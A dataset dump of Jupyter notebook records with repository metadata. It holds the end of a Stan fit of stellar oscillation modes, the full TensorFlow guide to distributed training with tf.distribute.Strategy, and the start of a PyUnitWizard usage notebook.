1.0\nmode_heights[9] 15.29 1.7e-3 0.34 14.64 15.06 15.29 15.51 15.95 40000 1.0\nmode_heights[10] 9.58 1.6e-3 0.32 8.95 9.36 9.58 9.8 10.21 40000 1.0\nmode_heights[11] 5.15 1.3e-3 0.27 4.63 4.97 5.15 5.33 5.68 40000 1.0\nmode_heights[12] 2.37 9.1e-4 0.18 2.02 2.24 2.36 2.49 2.73 40000 1.0\nmode_heights[13] 0.93 5.0e-4 0.1 0.75 0.86 0.93 1.0 1.14 40000 1.0\nlp__ -544.6 0.04 3.62 -552.7 -546.8 -544.3 -542.0 -538.6 10443 1.0\n\nSamples were drawn using NUTS at Mon Nov 5 17:25:33 2018.\nFor each parameter, n_eff is a crude measure of effective sample size,\nand Rhat is the potential scale reduction factor on split chains (at \nconvergence, Rhat=1).\n" ] ], [ [ "The convergence is good! (The nan Rhat is because the dnu value is so well constrained). We can check the inferred frequencies with respect to the true frequencies:", "_____no_output_____" ] ], [ [ "fig, ax = plt.subplots()\nax.scatter(f0s, fitsm['mode_freqs'].mean(axis=0) - f0s)\nax.errorbar(f0s, fitsm['mode_freqs'].mean(axis=0) - f0s, yerr=fitsm['mode_freqs'].std(axis=0))\nprint(fitsm['mode_freqs'].shape)\nprint(f0s.shape)", "(40000, 14)\n(14,)\n" ] ], [ [ "Here is a corner plot of the results:", "_____no_output_____" ] ], [ [ "import corner\npost = np.vstack([fitsm['dnu'], fitsm['numax'], fitsm['envheight'], fitsm['envwidth'], fitsm['modewidth']]).T\ncorner.corner(post)\nplt.show()", "_____no_output_____" ] ], [ [ "We can now compare the true model with the estimated model:", "_____no_output_____" ] ], [ [ "best = np.ones(len(f))\nbest += np.sum([lor(f, n, fitsm['modewidth'].mean(), gaussian(n, fitsm['numax'].mean(),\n fitsm['envheight'].mean(), fitsm['envwidth'].mean())\n ) for n in fitsm['mode_freqs'].mean(axis=0)], axis=0)\nplt.plot(f, best, 'k-.', label='best', zorder=99)\nplt.plot(f, true, label='true', zorder=98)\nplt.plot(f, data, label='Data')\nplt.legend()", "_____no_output_____" ] ], [ [ "This model works pretty well although things take a long time to converge. 
Hopefully for the real data, good informative priors on the general mode properties will help convergence.\n\nNote we will also have to use the proper chi squared two degrees of freedom noise of the real periodogram!", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e72ef159556d757f8bbf41f4e88b77ac857e3639
43,037
ipynb
Jupyter Notebook
site/en/guide/distribute_strategy.ipynb
MoniqueGautier/docs
3c232ea80b425efbcb0bb52bf1d26ca33cb26853
[ "Apache-2.0" ]
1
2019-05-15T12:37:10.000Z
2019-05-15T12:37:10.000Z
site/en/guide/distribute_strategy.ipynb
MoniqueGautier/docs
3c232ea80b425efbcb0bb52bf1d26ca33cb26853
[ "Apache-2.0" ]
null
null
null
site/en/guide/distribute_strategy.ipynb
MoniqueGautier/docs
3c232ea80b425efbcb0bb52bf1d26ca33cb26853
[ "Apache-2.0" ]
1
2020-04-20T18:08:01.000Z
2020-04-20T18:08:01.000Z
46.127546
1,143
0.621372
[ [ [ "##### Copyright 2018 The TensorFlow Authors.\n\n", "_____no_output_____" ] ], [ [ "#@title Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.", "_____no_output_____" ] ], [ [ "# Distributed Training in TensorFlow", "_____no_output_____" ], [ "<table class=\"tfo-notebook-buttons\" align=\"left\">\n <td>\n <a target=\"_blank\" href=\"https://www.tensorflow.org/alpha/guide/distribute_strategy\"><img src=\"https://www.tensorflow.org/images/tf_logo_32px.png\" />View on TensorFlow.org</a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/r2/guide/distribute_strategy.ipynb\"><img src=\"https://www.tensorflow.org/images/colab_logo_32px.png\" />Run in Google Colab</a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://github.com/tensorflow/docs/blob/master/site/en/r2/guide/distribute_strategy.ipynb\"><img src=\"https://www.tensorflow.org/images/GitHub-Mark-32px.png\" />View source on GitHub</a>\n </td>\n</table>", "_____no_output_____" ], [ "## Overview\n\n`tf.distribute.Strategy` is a TensorFlow API to distribute training\nacross multiple GPUs, multiple machines or TPUs. 
Using this API, users can distribute their existing models and training code with minimal code changes.\n\n`tf.distribute.Strategy` has been designed with these key goals in mind:\n* Easy to use and support multiple user segments, including researchers, ML engineers, etc.\n* Provide good performance out of the box.\n* Easy switching between strategies.\n\n`tf.distribute.Strategy` can be used with TensorFlow's high level APIs, [tf.keras](https://www.tensorflow.org/guide/keras) and [tf.estimator](https://www.tensorflow.org/guide/estimators), with just a couple of lines of code change. It also provides an API that can be used to distribute custom training loops (and in general any computation using TensorFlow).\nIn TensorFlow 2.0, users can execute their programs eagerly, or in a graph using [`tf.function`](../tutorials/eager/tf_function.ipynb). `tf.distribute.Strategy` intends to support both these modes of execution. Note that we may talk about training most of the time in this guide, but this API can also be used for distributing evaluation and prediction on different platforms.\n\nAs you will see in a bit, very few changes are needed to use `tf.distribute.Strategy` with your code. This is because we have changed the underlying components of TensorFlow to become strategy-aware. This includes variables, layers, models, optimizers, metrics, summaries, and checkpoints.\n\nIn this guide, we will talk about various types of strategies and how one can use them in a different situations.", "_____no_output_____" ] ], [ [ "# Import TensorFlow\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n!pip install tf-nightly-gpu\n\nimport tensorflow as tf", "_____no_output_____" ] ], [ [ "## Types of strategies\n`tf.distribute.Strategy` intends to cover a number of use cases along different axes. Some of these combinations are currently supported and others will be added in the future. 
Some of these axes are:\n* Syncronous vs asynchronous training: These are two common ways of distributing training with data parallelism. In sync training, all workers train over different slices of input data in sync, and aggregating gradients at each step. In async training, all workers are independently training over the input data and updating variables asynchronously. Typically sync training is supported via all-reduce and async through parameter server architecture.\n* Hardware platform: Users may want to scale their training onto multiple GPUs on one machine, or multiple machines in a network (with 0 or more GPUs each), or on Cloud TPUs.\n\nIn order to support these use cases, we have 4 strategies available. In the next section we will talk about which of these are supported in which scenarios in TF nightly at this time.", "_____no_output_____" ], [ "### MirroredStrategy\n`tf.distribute.MirroredStrategy` support synchronous distributed training on multiple GPUs on one machine. It creates one model replica per GPU device. Each variable in the model is mirrored across all the replicas. Together, these variables form a single conceptual variable called `MirroredVariable`. These variables are kept in sync with each other by applying identical updates.\n\nEfficient all-reduce algorithms are used to communicate the variable updates across the devices.\nAll-reduce aggregates tensors across all the devices by adding them up, and makes them available on each device.\nIt’s a fused algorithm that is very efficient and can reduce the overhead of synchronization significantly. There are many all-reduce algorithms and implementations available, depending on the type of communication available between devices. By default, it uses NVIDIA NCCL as the all-reduce implementation. 
The user can also choose between a few other options we provide, or write their own.\n\nHere is the simplest way of creating `MirroredStrategy`:\n", "_____no_output_____" ] ], [ [ "mirrored_strategy = tf.distribute.MirroredStrategy()", "_____no_output_____" ] ], [ [ "This will create a `MirroredStrategy` instance which will use all the GPUs that are visible to TensorFlow, and use NCCL as the cross device communication.\n\nIf you wish to use only some of the GPUs on your machine, you can do so like this:", "_____no_output_____" ] ], [ [ "mirrored_strategy = tf.distribute.MirroredStrategy(devices=[\"/gpu:0\", \"/gpu:1\"])", "_____no_output_____" ] ], [ [ "If you wish to override the cross device communication, you can do so using the `cross_device_ops` argument by supplying an instance of `tf.distribute.CrossDeviceOps`. Currently we provide `tf.distribute.HierarchicalCopyAllReduce` and `tf.distribute.ReductionToOneDevice` as 2 other options other than `tf.distribute.NcclAllReduce` which is the default.", "_____no_output_____" ] ], [ [ "mirrored_strategy = tf.distribute.MirroredStrategy(\n cross_device_ops=tf.distribute.HierarchicalCopyAllReduce())", "_____no_output_____" ] ], [ [ "### CentralStorageStrategy\n`tf.distribute.experimental.CentralStorageStrategy` does synchronous training as well. Variables are not mirrored, instead they are placed on the CPU and operations are replicated across all local GPUs. If there is only one GPU, all variables and operations will be placed on that GPU.\n\nCreate a `CentralStorageStrategy` by:\n", "_____no_output_____" ] ], [ [ "central_storage_strategy = tf.distribute.experimental.CentralStorageStrategy()", "_____no_output_____" ] ], [ [ "This will create a `CentralStorageStrategy` instance which will use all visible GPUs and CPU. 
Update to variables on replicas will be aggragated before being applied to variables.", "_____no_output_____" ], [ "Note: This strategy is [`experimental`](https://www.tensorflow.org/guide/version_compat#what_is_not_covered) as we are currently improving it and making it work for more scenarios. As part of this, please expect the APIs to change in the future.", "_____no_output_____" ], [ "### MultiWorkerMirroredStrategy\n\n`tf.distribute.experimental.MultiWorkerMirroredStrategy` is very similar to `MirroredStrategy`. It implements synchronous distributed training across multiple workers, each with potentially multiple GPUs. Similar to `MirroredStrategy`, it creates copies of all variables in the model on each device across all workers.\n\nIt uses [CollectiveOps](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/ops/collective_ops.py) as the multi-worker all-reduce communication method used to keep variables in sync. A collective op is a single op in the TensorFlow graph which can automatically choose an all-reduce algorithm in the TensorFlow runtime according to hardware, network topology and tensor sizes.\n\nIt also implements additional performance optimizations. For example, it includes a static optimization that converts multiple all-reductions on small tensors into fewer all-reductions on larger tensors. In addition, we are designing it to have a plugin architecture - so that in the future, users will be able to plugin algorithms that are better tuned for their hardware. Note that collective ops also implement other collective operations such as broadcast and all-gather.\n\nHere is the simplest way of creating `MultiWorkerMirroredStrategy`:", "_____no_output_____" ] ], [ [ "multiworker_strategy = tf.distribute.experimental.MultiWorkerMirroredStrategy()", "_____no_output_____" ] ], [ [ "`MultiWorkerMirroredStrategy` currently allows you to choose between two different implementations of collective ops. 
`CollectiveCommunication.RING` implements ring-based collectives using gRPC as the communication layer. `CollectiveCommunication.NCCL` uses [Nvidia's NCCL](https://developer.nvidia.com/nccl) to implement collectives. `CollectiveCommunication.AUTO` defers the choice to the runtime. The best choice of collective implementation depends upon the number and kind of GPUs, and the network interconnect in the cluster. You can specify them like so:\n", "_____no_output_____" ] ], [ [ "multiworker_strategy = tf.distribute.experimental.MultiWorkerMirroredStrategy(\n tf.distribute.experimental.CollectiveCommunication.NCCL)", "_____no_output_____" ] ], [ [ "\nOne of the key differences to get multi worker training going, as compared to multi-GPU training, is the multi-worker setup. \"TF_CONFIG\" environment variable is the standard way in TensorFlow to specify the cluster configuration to each worker that is part of the cluster. See section on [\"TF_CONFIG\" below](#TF_CONFIG) for more details on how this can be done.\n\n", "_____no_output_____" ], [ "Note: This strategy is [`experimental`](https://www.tensorflow.org/guide/version_compat#what_is_not_covered) as we are currently improving it and making it work for more scenarios. As part of this, please expect the APIs to change in the future.", "_____no_output_____" ], [ "### TPUStrategy\n`tf.distribute.experimental.TPUStrategy` lets users run their TensorFlow training on Tensor Processing Units (TPUs). TPUs are Google's specialized ASICs designed to dramatically accelerate machine learning workloads. They are available on Google Colab, the [TensorFlow Research Cloud](https://www.tensorflow.org/tfrc) and [Google Compute Engine](https://cloud.google.com/tpu).\n\nIn terms of distributed training architecture, TPUStrategy is the same `MirroredStrategy` - it implements synchronous distributed training. 
TPUs provide their own implementation of efficient all-reduce and other collective operations across multiple TPU cores, which are used in `TPUStrategy`.\n\nHere is how you would instantiate `TPUStrategy`.\nNote: To run this code in Colab, you should select TPU as the Colab runtime. See [Using TPUs]( tpu.ipynb) guide for a runnable version.\n\n```\nresolver = tf.distribute.cluster_resolver.TPUClusterResolver()\ntf.tpu.experimental.initialize_tpu_system(resolver)\ntpu_strategy = tf.distribute.experimental.TPUStrategy(resolver)\n```\n", "_____no_output_____" ], [ "`TPUClusterResolver` instance helps locate the TPUs. In Colab, you don't need to specify any arguments to it. If you want to use this for Cloud TPUs, you will need to specify the name of your TPU resource in `tpu` argument. We also need to initialize the tpu system explicitly at the start of the program. This is required before TPUs can be used for computation and should ideally be done at the beginning because it also wipes out the TPU memory so all state will be lost.", "_____no_output_____" ], [ "Note: This strategy is [`experimental`](https://www.tensorflow.org/guide/version_compat#what_is_not_covered) as we are currently improving it and making it work for more scenarios. As part of this, please expect the APIs to change in the future.", "_____no_output_____" ], [ "### ParameterServerStrategy\n`tf.distribute.experimental.ParameterServerStrategy` supports parameter servers training on multiple machines. In this setup, some machines are designated as workers and some as parameter servers. Each variable of the model is placed on one parameter server. 
Computation is replicated across all GPUs of the all the workers.\n\nIn terms of code, it looks similar to other strategies:\n```\nps_strategy = tf.distribute.experimental.ParameterServerStrategy()\n```", "_____no_output_____" ], [ "For multi worker training, \"TF_CONFIG\" needs to specify the configuration of parameter servers and workers in your cluster, which you can read more about in [\"TF_CONFIG\" below](#TF_CONFIG) below.", "_____no_output_____" ], [ "\nSo far we've talked about what are the different stategies available and how you can instantiate them. In the next few sections, we will talk about the different ways in which you can use them to distribute your training. We will show short code snippets in this guide and link off to full tutorials which you can run end to end.", "_____no_output_____" ], [ "## Using `tf.distribute.Strategy` with Keras\nWe've integrated `tf.distribute.Strategy` into `tf.keras` which is TensorFlow's implementation of the\n[Keras API specification](https://keras.io). `tf.keras` is a high-level API to build and train models. By integrating into `tf.keras` backend, we've made it seamless for Keras users to distribute their training written in the Keras training framework. The only things that need to change in a user's program are: (1) Create an instance of the appropriate `tf.distribute.Strategy` and (2) Move the creation and compiling of Keras model inside `strategy.scope`.\n\nHere is a snippet of code to do this for a very simple Keras model with one dense layer:", "_____no_output_____" ] ], [ [ "mirrored_strategy = tf.distribute.MirroredStrategy()\nwith mirrored_strategy.scope():\n model = tf.keras.Sequential([tf.keras.layers.Dense(1, input_shape=(1,))])\n model.compile(loss='mse', optimizer='sgd')", "_____no_output_____" ] ], [ [ "In this example we used `MirroredStrategy` so we can run this on a machine with multiple GPUs. `strategy.scope()` indicated which parts of the code to run distributed. 
Creating a model inside this scope allows us to create mirrored variables instead of regular variables. Compiling under the scope allows us to know that the user intends to train this model using this strategy. Once this is setup, you can fit your model like you would normally. `MirroredStrategy` takes care of replicating the model's training on the available GPUs, aggregating gradients etc.", "_____no_output_____" ] ], [ [ "dataset = tf.data.Dataset.from_tensors(([1.], [1.])).repeat(100).batch(10)\nmodel.fit(dataset, epochs=2)\nmodel.evaluate(dataset)", "_____no_output_____" ] ], [ [ "Here we used a `tf.data.Dataset` to provide the training and eval input. You can also use numpy arrays:", "_____no_output_____" ] ], [ [ "import numpy as np\ninputs, targets = np.ones((100, 1)), np.ones((100, 1))\nmodel.fit(inputs, targets, epochs=2, batch_size=10)", "_____no_output_____" ] ], [ [ "In both cases (dataset or numpy), each batch of the given input is divided equally among the multiple replicas. For instance, if using `MirroredStrategy` with 2 GPUs, each batch of size 10 will get divided among the 2 GPUs, with each receiving 5 input examples in each step. Each epoch will then train faster as you add more GPUs. Typically, you would want to increase your batch size as you add more accelerators so as to make effective use of the extra computing power. You will also need to re-tune your learning rate, depending on the model. 
You can use `strategy.num_replicas_in_sync` to get the number of replicas.", "_____no_output_____" ] ], [ [ "# Compute global batch size using number of replicas.\nBATCH_SIZE_PER_REPLICA = 5\nglobal_batch_size = (BATCH_SIZE_PER_REPLICA *\n mirrored_strategy.num_replicas_in_sync)\ndataset = tf.data.Dataset.from_tensors(([1.], [1.])).repeat(100)\ndataset = dataset.batch(global_batch_size)\n\nLEARNING_RATES_BY_BATCH_SIZE = {5: 0.1, 10: 0.15}\nlearning_rate = LEARNING_RATES_BY_BATCH_SIZE[global_batch_size]", "_____no_output_____" ] ], [ [ "### What's supported now?\n\nIn [TF nightly release](https://pypi.org/project/tf-nightly-gpu/), we now support training with Keras using all strategies.\n\nNote: When using `MultiWorkerMirorredStrategy` for multiple workers or `TPUStrategy` with more than one host with Keras, currently the user will have to explicitly shard or shuffle the data for different workers, but we will change this in the future to automatically shard the input data intelligently.\n\n### Examples and Tutorials\n\nHere is a list of tutorials and examples that illustrate the above integration end to end with Keras:\n1. [Tutorial](../tutorials/distribute/keras.ipynb) to train MNIST with `MirroredStrategy`.\n2. Official [ResNet50](https://github.com/tensorflow/models/blob/master/official/resnet/keras/keras_imagenet_main.py) training with ImageNet data using `MirroredStrategy`.\n3. [ResNet50](https://github.com/tensorflow/tpu/blob/master/models/experimental/resnet50_keras/resnet50.py) trained with Imagenet data on Cloud TPus with `TPUStrategy`.", "_____no_output_____" ], [ "## Using `tf.distribute.Strategy` with Estimator\n`tf.estimator` is a distributed training TensorFlow API that originally supported the async parameter server approach. Like with Keras, we've integrated `tf.distribute.Strategy` into `tf.Estimator` so that a user who is using Estimator for their training can easily change their training is distributed with very few changes to your their code. 
With this, estimator users can now do synchronous distributed training on multiple GPUs and multiple workers, as well as use TPUs.\n\nThe usage of `tf.distribute.Strategy` with Estimator is slightly different than the Keras case. Instead of using `strategy.scope`, now we pass the strategy object into the [`RunConfig`](https://www.tensorflow.org/api_docs/python/tf/estimator/RunConfig) for the Estimator.\n\nHere is a snippet of code that shows this with a premade estimator `LinearRegressor` and `MirroredStrategy`:\n", "_____no_output_____" ] ], [ [ "mirrored_strategy = tf.distribute.MirroredStrategy()\nconfig = tf.estimator.RunConfig(\n train_distribute=mirrored_strategy, eval_distribute=mirrored_strategy)\nregressor = tf.estimator.LinearRegressor(\n feature_columns=[tf.feature_column.numeric_column('feats')],\n optimizer='SGD',\n config=config)", "_____no_output_____" ] ], [ [ "We use a premade Estimator here, but the same code works with a custom Estimator as well. `train_distribute` determines how training will be distributed, and `eval_distribute` determines how evaluation will be distributed. This is another difference from Keras where we use the same strategy for both training and eval.\n\nNow we can train and evaluate this Estimator with an input function:\n", "_____no_output_____" ] ], [ [ "def input_fn():\n dataset = tf.data.Dataset.from_tensors(({\"feats\":[1.]}, [1.]))\n return dataset.repeat(1000).batch(10)\nregressor.train(input_fn=input_fn, steps=10)\nregressor.evaluate(input_fn=input_fn, steps=10)", "_____no_output_____" ] ], [ [ "Another difference to highlight here between Estimator and Keras is the input handling. In Keras, we mentioned that each batch of the dataset is split across the multiple replicas. In Estimator, however, the user provides an `input_fn` and have full control over how they want their data to be distributed across workers and devices. 
We do not do automatic splitting of batch, nor automatically shard the data across different workers. The provided `input_fn` is called once per worker, thus giving one dataset per worker. Then one batch from that dataset is fed to one replica on that worker, thereby consuming N batches for N replicas on 1 worker. In other words, the dataset returned by the `input_fn` should provide batches of size `PER_REPLICA_BATCH_SIZE`. And the global batch size for a step can be obtained as `PER_REPLICA_BATCH_SIZE * strategy.num_replicas_in_sync`. When doing multi worker training, users will also want to either split their data across the workers, or shuffle with a random seed on each. You can see an example of how to do this in the [multi-worker tutorial](../tutorials/distribute/multi_worker.ipynb).", "_____no_output_____" ], [ "We showed an example of using `MirroredStrategy` with Estimator. You can also use `TPUStrategy` with Estimator as well, in the exact same way:\n```\nconfig = tf.estimator.RunConfig(\n train_distribute=tpu_strategy, eval_distribute=tpu_strategy)\n```", "_____no_output_____" ], [ "And similarly, you can use multi worker and parameter server strategies as well. The code remains the same, but you need to use `tf.estimator.train_and_evaluate`, and set \"TF_CONFIG\" environment variables for each binary running in your cluster.", "_____no_output_____" ], [ "### What's supported now?\n\nIn TF nightly release, we support training with Estimator using all strategies.\n\n### Examples and Tutorials\nHere are some examples that show end to end usage of various strategies with Estimator:\n\n1. [End to end example](https://github.com/tensorflow/ecosystem/tree/master/distribution_strategy) for multi worker training in tensorflow/ecosystem using Kuberentes templates. This example starts with a Keras model and converts it to an Estimator using the `tf.keras.estimator.model_to_estimator` API.\n2. 
Official [ResNet50](https://github.com/tensorflow/models/blob/master/official/resnet/imagenet_main.py) model, which can be trained using either `MirroredStrategy` or `MultiWorkerMirroredStrategy`.\n3. [ResNet50](https://github.com/tensorflow/tpu/blob/master/models/experimental/distribution_strategy/resnet_estimator.py) example with TPUStrategy.", "_____no_output_____" ], [ "## Using `tf.distribute.Strategy` with custom training loops\nAs you've seen, using `tf.distrbute.Strategy` with high level APIs is only a couple lines of code change. With a little more effort, `tf.distrbute.Strategy` can also be used by other users who are not using these frameworks.\n\nTensorFlow is used for a wide variety of use cases and some users (such as researchers) require more flexibility and control over their training loops. This makes it hard for them to use the high level frameworks such as Estimator or Keras. For instance, someone using a GAN may want to take a different number of generator or discriminator steps each round. Similarly, the high level frameworks are not very suitable for Reinforcement Learning training. So these users will usually write their own training loops.\n\nFor these users, we provide a core set of methods through the `tf.distrbute.Strategy` classes. Using these may require minor restructuring of the code initially, but once that is done, the user should be able to switch between GPUs / TPUs / multiple machines by just changing the strategy instance.\n\nHere we will show a brief snippet illustrating this use case for a simple training example using the same Keras model as before.\nNote: These APIs are still experimental and we are improving them to make them more user friendly.", "_____no_output_____" ], [ "First, we create the model and optimizer inside the strategy's scope. 
This ensures that any variables created with the model and optimizer are mirrored variables.", "_____no_output_____" ] ], [ [ "with mirrored_strategy.scope():\n model = tf.keras.Sequential([tf.keras.layers.Dense(1, input_shape=(1,))])\n optimizer = tf.train.GradientDescentOptimizer(0.1)", "_____no_output_____" ] ], [ [ "Next, we create the input dataset and call `make_dataset_iterator` to distribute the dataset based on the strategy. This API is expected to change in the near future.", "_____no_output_____" ] ], [ [ "with mirrored_strategy.scope():\n dataset = tf.data.Dataset.from_tensors(([1.], [1.])).repeat(1000).batch(\n global_batch_size)\n input_iterator = mirrored_strategy.make_dataset_iterator(dataset)", "_____no_output_____" ] ], [ [ "Then, we define one step of the training. We will use `tf.GradientTape` to compute gradients and optimizer to apply those gradients to update our model's variables. To distribute this training step, we put it in a function `step_fn` and pass it to `strategy.experimental_run` along with the iterator created before:", "_____no_output_____" ] ], [ [ "def train_step():\n def step_fn(inputs):\n features, labels = inputs\n logits = model(features)\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(\n logits=logits, labels=labels)\n loss = tf.reduce_sum(cross_entropy) * (1.0 / global_batch_size)\n train_op = optimizer.minimize(loss)\n with tf.control_dependencies([train_op]):\n return tf.identity(loss)\n\n per_replica_losses = mirrored_strategy.experimental_run(\n step_fn, input_iterator)\n mean_loss = mirrored_strategy.reduce(\n tf.distribute.ReduceOp.SUM, per_replica_losses, axis=None)\n return mean_loss", "_____no_output_____" ] ], [ [ "A few other things to note in the code above:\n1. We used `tf.nn.softmax_cross_entropy_with_logits` to compute the loss. And then we scaled the total loss by the global batch size. 
This is important because all the replicas are training in sync and number of examples in each step of training is the global batch. So the loss needs to be divided by the global batch size and not by the replica (local) batch size.\n2. We used the `strategy.reduce` API to aggregate the results returned by `experimental_run`. `experimental_run` returns results from each local replica in the strategy, and there are multiple ways to consume this result. You can `reduce` them to get an aggregated value. You can also do `strategy.unwrap(results)`* to get the list of values contained in the result, one per local replica.\n\n*expected to change\n", "_____no_output_____" ], [ "Finally, once we have defined the training step, we can initialize the iterator and variables and run the training in a loop:", "_____no_output_____" ] ], [ [ "with mirrored_strategy.scope():\n iterator_init = input_iterator.initialize()\n var_init = tf.global_variables_initializer()\n loss = train_step()\n with tf.Session() as sess:\n sess.run([iterator_init, var_init])\n for _ in range(10):\n print(sess.run(loss))", "_____no_output_____" ] ], [ [ "In the example above, we used `make_dataset_iterator` to provide input to your training. We also provide two additional APIs: `make_input_fn_iterator` and `make_experimental_numpy_iterator` to support other kinds of inputs. See their documentation in `tf.distribute.Strategy` and how they differ from `make_dataset_iterator`.", "_____no_output_____" ], [ "This covers the simplest case of using `tf.distribute.Strategy` API to do distribute custom training loops. We are in the process of improving these APIs. Since this use case requres more work on the part of the user, we will be publishing a separate detailed guide for this use case in the future.", "_____no_output_____" ], [ "### What's supported now?\nIn TF nightly release, we support training with custom training loops using `MirroredStrategy` and `TPUStrategy` as shown above. 
Support for other strategies will be coming in soon. `MultiWorkerMirorredStrategy` support will be coming in the future.\n\n### Examples and Tutorials\nHere are some examples for using distribution strategy with custom training loops:\n1. [Example](https://github.com/tensorflow/tensorflow/blob/5456cc28f3f8d9c17c645d9a409e495969e584ae/tensorflow/contrib/distribute/python/examples/mnist_tf1_tpu.py) to train MNIST using `TPUStrategy`.\n", "_____no_output_____" ], [ "## Other topics\nIn this section, we will cover some topics that are relevant to multiple use cases.", "_____no_output_____" ], [ "<a id=\"TF_CONFIG\">\n### Setting up TF\\_CONFIG environment variable\n</a>\nFor multi-worker training, as mentioned before, you need to set \"TF\\_CONFIG\" environment variable for each\nbinary running in your cluster. The \"TF\\_CONFIG\" environment variable is a JSON string which specifies what\ntasks constitute a cluster, their addresses and each task's role in the cluster. We provide a Kubernetes template in the\n[tensorflow/ecosystem](https://github.com/tensorflow/ecosystem) repo which sets\n\"TF\\_CONFIG\" for your training tasks.\n\nOne example of \"TF\\_CONFIG\" is:\n```\nos.environ[\"TF_CONFIG\"] = json.dumps({\n \"cluster\": {\n \"worker\": [\"host1:port\", \"host2:port\", \"host3:port\"],\n \"ps\": [\"host4:port\", \"host5:port\"]\n },\n \"task\": {\"type\": \"worker\", \"index\": 1}\n})\n```\n", "_____no_output_____" ], [ "This \"TF\\_CONFIG\" specifies that there are three workers and two ps tasks in the\ncluster along with their hosts and ports. The \"task\" part specifies that the\nrole of the current task in the cluster, worker 1 (the second worker). Valid roles in a cluster is\n\"chief\", \"worker\", \"ps\" and \"evaluator\". There should be no \"ps\" job except when using `tf.distribute.experimental.ParameterServerStrategy`.", "_____no_output_____" ], [ "## What's next?\n\n`tf.distribute.Strategy` is actively under development. 
We welcome you to try it out and provide your feedback via [issues on GitHub](https://github.com/tensorflow/tensorflow/issues/new).", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
e72f154f80a5242e18323f0d1e82b9a045832f39
5,505
ipynb
Jupyter Notebook
docs/contents/In_Your_Library.ipynb
dprada/pyunitwizard
dbfd0c015f9359c76e7e59a5c16ab469b86aed34
[ "MIT" ]
null
null
null
docs/contents/In_Your_Library.ipynb
dprada/pyunitwizard
dbfd0c015f9359c76e7e59a5c16ab469b86aed34
[ "MIT" ]
null
null
null
docs/contents/In_Your_Library.ipynb
dprada/pyunitwizard
dbfd0c015f9359c76e7e59a5c16ab469b86aed34
[ "MIT" ]
null
null
null
25.368664
230
0.547321
[ [ [ "# PyUnitWizard in your library\n*-Instructions to work with PyUnitWizard inside your own library-*\n\nHere you can find the instructions to include PyUnitWizard in your projects. Following this indications, you don't need to worry about the requirements of the libraries supported by PyUnitWizard.\n\nTo illustrate how to include PyUnitWizard let's see a very simple library you can find in [github repository (examples directory)](https://github.com/uibcdf/PyUnitWizard/tree/main/examples): `testlib`. This is its structure:", "_____no_output_____" ], [ "```bash\ntree --dirsfirst --charset=markdown testlib\n```", "_____no_output_____" ], [ "```\ntestlib\n|-- box\n| |-- __init__.py\n| |-- methods_a.py\n| |-- methods_b.py\n| `-- methods_c.py\n|-- _pyunitwizard\n| `-- __init__.py\n|-- __init__.py\n```", "_____no_output_____" ], [ "Make a directory named `_pyunitwizard` in your project top directory. And include in `_pyunitwizard` a `__init__.py` file such as:", "_____no_output_____" ], [ "```python\n### testlib/_pyunitwizard/__init__.py ###\nimport pyunitwizard as puw\n\n# In this case Pint and openmm.unit are loaded:\npuw.load_libraries(['pint', 'openmm.unit'])\n\n# And openmm.unit is defined as default form\npuw.set_default_form('openmm.unit')\n```", "_____no_output_____" ], [ "Now, let's define some methods using your `_pyunitwizard` module. 
